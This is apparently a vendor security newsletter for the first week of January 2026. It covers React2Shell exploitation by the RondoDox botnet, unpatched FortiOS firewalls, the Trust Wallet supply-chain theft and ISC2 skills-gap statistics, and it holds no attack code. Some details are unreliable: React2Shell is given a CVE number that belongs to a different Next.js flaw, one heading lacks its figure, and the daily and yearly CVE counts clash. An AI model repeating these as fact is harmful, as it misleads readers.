React2Shell Hit Botnets and supply chain vulns cost $ | Jan 1-7
Big Picture
Happy first week back in office. Busy isn't it?
2026 opened with RondoDox botnet operators shipping React2Shell exploits in 30 days. The other current event of note is Trust Wallet's $8.5M theft, which is the first time a supply chain attack of this nature has a confirmed price tag.
Last ISC2 data confirmed what we suspected: 88% of incidents stem from skills gaps, not headcount.
TL;DR
RondoDox botnet weaponized React2Shell by January 2—30 days from CVE to commodity exploit. Next.js servers got hit before most orgs could patch.
Trust Wallet lost $8.5 million to Shai-Hulud 2.0—first major dollar figure tied directly to npm supply chain compromise. Abstract risk now has a price tag.
88% of security incidents stem from skills gaps, not headcount. ISC2's 2025 study confirms AI approaches required.
React2Shell Moves From Disclosure to Botnet in Weeks
The RondoDox botnet began targeting Next.js servers vulnerable to React2Shell within weeks of the December 3 disclosure. Maximum CVSS severity. Adaptable botnet operators. Production servers exposed before most organizations finished initial assessments. This is what AppSec faces these days.
This isn't a surprise if you've been following the pattern. Last month we covered five China-nexus groups exploiting the same vulnerability across 116,000 systems. This time commodity botnets joined the party.
But boy does this stuff happen fast now. The timeline really tells the story. React2Shell disclosed December 3. Coordinated Adobe ColdFusion campaigns hit Christmas Day. RondoDox weaponization confirmed by January.
Kelly Shortridge, CPO at Fastly, called it "a one click, game over kind of vulnerability." She notes, "We see it basically hitting everyone."
Takeaways
Framework-level vulnerabilities create multiplicative remediation burden with one CVE potentially affecting every application using that framework.
Five Years Later, 10,000 FortiOS Firewalls Still Vulnerable
Ten thousand firewalls remain vulnerable to CVE-2020-12812, a five-year-old FortiOS flaw that bypasses two-factor authentication. The patch shipped July 2020. Attackers are still actively exploiting it in January 2026.
This isn't about lazy administrators. Traditional patch management requires downtime windows, extensive testing, and coordination across teams. Operational constraints create delays. CISA's KEV catalog grew 20% to 1,484 entries in 2025, with many linked to ransomware campaigns. It's just a fact today that known, exploited vulnerabilities persist at scale despite patch availability.
Takeaways
The 2025 CVE Data Review is also a reminder of the pace of new vulns too. The research shows 48,185 CVEs published last year, up 21% from 2024.
The researcher's conclusion: "You can't patch everything. Your only move is to ruthlessly prioritize based on exploitability and automate the rest." (and that's what Pixee does for you :)
Trust Wallet's $8.5M Loss Puts a Dollar Figure on Supply Chain Risk
Trust Wallet lost $8.5 million after hackers used stolen keys to inject malicious code into its Chrome extension. The attack traces back to the Shai-Hulud 2.0 supply chain compromise that exposed GitHub secrets at scale.
This matters because it's the first major financial loss publicly attributed to developer secrets exposure via supply chain attack. Abstract risk became concrete dollars. The same week, GitHub Actions compromise affected 23,000 repositories, GlassWorm distributed trojanized VSCode extensions, and NeoShadow combined JavaScript, MSBuild, and blockchain techniques in a sophisticated multi-stage npm attack.
Takeaways
Attackers are coordinating focus on developer tooling. npm packages. VSCode extensions. GitHub secrets. CI/CD pipelines. Traditional perimeter security doesn't help when developers work with tools and credentials that provide direct paths to production.
% of Security Incidents Stem From Skills Gaps, Not Headcount
ISC2's 2025 workforce study reframes the security staffing challenge. 88% of organizations experienced security incidents due to skills gaps, not insufficient headcount. The bottleneck isn't how many people you have. It's whether limited expertise can scale to threat velocity.
The cost constraint is real. 29% of organizations cannot afford staff with needed skills. 33% lack sufficient budget to adequately staff teams. Meanwhile, 48,185 CVEs shipped in 2025 (115 disclosed daily, up 30% YoY), framework vulnerabilities move to exploitation in weeks, and Daniel Miessler's 2026 predictions forecast AI agents increasingly handling security operations at scale.
Industry consolidation reflects the same thesis. December saw 30 cybersecurity M&A deals, with direct AppSec competitors making strategic acquisitions. When major vendors pay premium multiples for automation capabilities, they're betting on where the category is headed.
The vulnerability explosion tells the story.
• 115 CVEs disclosed daily (22,250+ by mid-2025, up 30% YoY)
• 305,000+ total CVEs in the database
• 245 new entries in CISA's KEV catalog (+20% vs. 2024)
• 45% more legacy vulnerabilities being added, some dating to 2007
Takeaways
48,185 CVEs. 88% of incidents from skills gaps. 29% can't afford the expertise. Hiring isn't the fix. Rethinking how you deploy limited expertise is.
Vulnerabilities in the Wild
Critical & Actively Exploited
React2Shell (CVE-2025-29927)Affected: Next.js middlewareCVSS: 10.0 (Maximum)Status: Actively ExploitedMaximum-severity vulnerability in Next.js middleware allowing remote code execution. RondoDox botnet weaponized within weeks of December 3 disclosure.Source
CVE-2020-12812Affected: FortiOSCVSS: 9.8 (Critical)Status: Actively ExploitedFive-year-old FortiOS flaw bypassing two-factor authentication. 10,000+ firewalls remain vulnerable despite patch availability since July 2020.Source
IBM API Connect Auth BypassAffected: IBM API ConnectCVSS: CriticalStatus: Active Exploitation LikelyCritical authentication bypass vulnerability in IBM API Connect affecting enterprise API infrastructure.Source
CVE-2025-61808Affected: Adobe ColdFusionCVSS: CriticalStatus: Actively ExploitedRCE via ColdFusion Archive deployment. Coordinated exploitation campaign observed during Christmas holiday period.Source
Dolby Android VulnerabilityAffected: Android (Dolby component)CVSS: CriticalStatus: PatchedCritical Dolby vulnerability patched in Android January security update.Source
Supply Chain Attacks This Week
Shai-Hulud 2.0Impact: $8.5M theft from Trust WalletVector: npm package compromise exposing GitHub secretsStatus: Ongoing variants detectedSource
GlassWormImpact: Trojanized VSCode extensions targeting Mac usersVector: OpenVSX marketplace distributionStatus: ActiveSource
NeoShadowImpact: Multi-stage npm supply chain attackVector: JavaScript + MSBuild + blockchain techniquesStatus: ActiveSource
GitHub Actions CompromiseImpact: 23,000 repositories affectedVector: CI/CD pipeline compromiseStatus: Remediation ongoingSource
By the Numbers
• 48,185 CVEs published in 2025 (+21% YoY)
• 1,484 entries in CISA KEV catalog (+20% in 2025)
• 245 new KEV entries added in 2025
Curated Reading List
Thought-Provoking
Guardrails Make AI-Assisted Development Safer By DesignWhy it's worth your time: As AI coding assistants proliferate, this piece establishes that securing AI-generated code requires architectural controls, not just scanning. Essential context for teams adopting GitHub Copilot or similar tools.
2025 Hacking the Cloud: Year in ReviewWhy it's worth your time: Comprehensive retrospective on cloud attack techniques that evolved in 2025. Provides tactical awareness for teams securing cloud-native applications and infrastructure.
IDOR Vulnerabilities Explained: Why They Persist in Modern ApplicationsWhy it's worth your time: Insecure Direct Object References remain stubbornly common despite decades of awareness. This deep-dive explains why they persist and what modern prevention looks like.
Current Events
Cybersecurity Leaders' Resolutions for 2026Why it's worth your time: CISOs and security leaders share their priorities for the year ahead. Useful benchmark for aligning your Q1 roadmap with industry direction.
